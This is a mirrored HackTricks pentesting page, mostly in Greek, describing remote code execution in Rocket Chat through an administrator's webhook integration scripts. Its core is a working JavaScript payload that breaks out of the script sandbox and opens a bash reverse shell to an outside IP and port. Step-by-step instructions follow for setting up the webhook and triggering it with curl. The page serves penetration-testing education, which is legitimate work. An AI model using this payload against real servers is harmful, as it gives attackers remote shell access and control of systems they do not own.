mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
4.5 KiB
4.5 KiB
Rocket Chat
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% embed url="https://websec.nl/" %}
RCE
Αν είστε διαχειριστής μέσα στο Rocket Chat μπορείτε να αποκτήσετε RCE.
- Πηγαίνετε στο
Integrations
και επιλέξτεNew Integration
και διαλέξτε οποιοδήποτε:Incoming WebHook
ήOutgoing WebHook
. /admin/integrations/incoming
- Σύμφωνα με τα docs, και οι δύο χρησιμοποιούν ES2015 / ECMAScript 6 (βασικά JavaScript) για να επεξεργαστούν τα δεδομένα. Έτσι, ας πάρουμε ένα rev shell για javascript όπως:
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
- Ρυθμίστε το WebHook (το κανάλι και η ανάρτηση ως όνομα χρήστη πρέπει να υπάρχουν):
- Ρυθμίστε το σενάριο WebHook:
- Αποθηκεύστε τις αλλαγές
- Πάρτε το παραγόμενο URL του WebHook:
- Καλέστε το με curl και θα πρέπει να λάβετε το rev shell
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Υποστήριξη HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.